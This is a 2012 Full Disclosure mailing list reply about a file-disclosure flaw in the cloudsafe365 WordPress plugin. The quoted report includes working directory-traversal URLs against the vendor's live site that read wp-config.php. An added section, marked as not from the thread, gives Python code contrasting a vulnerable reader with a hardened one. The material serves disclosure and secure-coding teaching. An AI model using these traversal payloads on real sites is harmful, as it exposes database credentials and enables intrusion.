Full Disclosure mailing list archives
Re: cloudsafe365 for wordpress: file disclosure
From: Henri Salo <henri () nerv fi>
Date: Tue, 28 Aug 2012 11:50:15 +0300
On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:
> This WordPress security plugin lets you read arbitrary files on the system.
> Looking at the code, there will be plenty of stuff like this.
>
> Demo:
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
>
> Disclosure timeline:
> * Today: visit wordpress.org
> * Try to report bug
> * System wants login
> * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name
> * Stuff it, I'm not going to phone them
I can verify and report this. Could you list all the vulnerabilities you can find in the plugin? You can also contact the plugins () wordpress org address in case you find vulnerabilities in WordPress plugins in the future.

- Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
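The bug class reported above is a directory traversal: the editor endpoint takes a `file` parameter and opens it relative to its own directory, so five `../` steps climb out of `wp-content/plugins/cloudsafe365-for-wp/admin/editor/` to the WordPress root and `wp-config.php`. The following is an added example, not the plugin's code or anything posted in the thread. It builds a fake WordPress tree in a temporary directory (the `wp-config.php` contents are constructed), shows a `vulnerable_read` that mirrors the reported behaviour, and a `safe_read` that canonicalises the path with `realpath`, refuses anything outside the editor directory, and restricts the editor to an assumed allowlist of asset extensions.

```python
"""Directory traversal in a file-editor endpoint: vulnerable vs. hardened.

Added example; not the cloudsafe365 plugin's code. The WordPress layout and
file contents below are constructed in a temp dir so it runs offline.
"""
import os
import shutil
import tempfile

# Path of the editor script relative to the WordPress root, as in the PoC URL.
EDITOR_SUBDIR = os.path.join(
    "wp-content", "plugins", "cloudsafe365-for-wp", "admin", "editor")

# Assumption: a theme/plugin editor only needs to touch static assets.
ALLOWED_EXT = {".css", ".js", ".html"}

# The exact payload from the disclosure: five steps up reach the WP root.
TRAVERSAL_PAYLOAD = "../../../../../wp-config.php"


def make_fake_wordpress():
    """Create <tmp>/wp-config.php and <tmp>/<EDITOR_SUBDIR>/style.css (constructed)."""
    root = tempfile.mkdtemp(prefix="wp-")
    editor = os.path.join(root, EDITOR_SUBDIR)
    os.makedirs(editor)
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php define('DB_PASSWORD', 'constructed-secret'); ?>\n")
    with open(os.path.join(editor, "style.css"), "w") as f:
        f.write("body { color: #000; }\n")
    return root, editor


def vulnerable_read(editor_dir, file_param):
    """Mirrors the reported bug: base dir + untrusted name, no validation at all."""
    with open(os.path.join(editor_dir, file_param)) as f:
        return f.read()


def safe_read(editor_dir, file_param):
    """Hardened version: canonicalise, confine to editor_dir, allowlist extensions."""
    base = os.path.realpath(editor_dir)
    # realpath also collapses symlinks, so a link inside base pointing
    # outside it is rejected by the containment check below.
    target = os.path.realpath(os.path.join(base, file_param))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes editor directory: %r" % file_param)
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXT:
        raise PermissionError("extension not allowed: %r" % file_param)
    with open(target) as f:
        return f.read()


def is_rejected(editor_dir, file_param):
    """True if the hardened reader refuses file_param."""
    try:
        safe_read(editor_dir, file_param)
    except PermissionError:
        return True
    return False


def demo():
    """Run both readers against the PoC payload; returns what each did."""
    root, editor = make_fake_wordpress()
    try:
        leaked = vulnerable_read(editor, TRAVERSAL_PAYLOAD)
        return {
            "vulnerable_leaks_config": "DB_PASSWORD" in leaked,
            "safe_rejects_traversal": is_rejected(editor, TRAVERSAL_PAYLOAD),
            "safe_rejects_absolute": is_rejected(editor, "/etc/passwd"),
            "safe_reads_asset": safe_read(editor, "style.css").startswith("body"),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-26s %s" % (k, v))
```

The containment check must run on the canonical path, not on the raw parameter: rejecting the substring `..` misses absolute paths and encoded variants, while comparing `realpath` results catches all of them. The extension allowlist is a second, independent layer; even a file inside the editor directory that is not an asset (for example a `.php` file) is refused.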
Current thread:
- cloudsafe365 for wordpress: file disclosure Jan van Niekerk (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Ivan Carlos (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure craig deveson (Aug 28)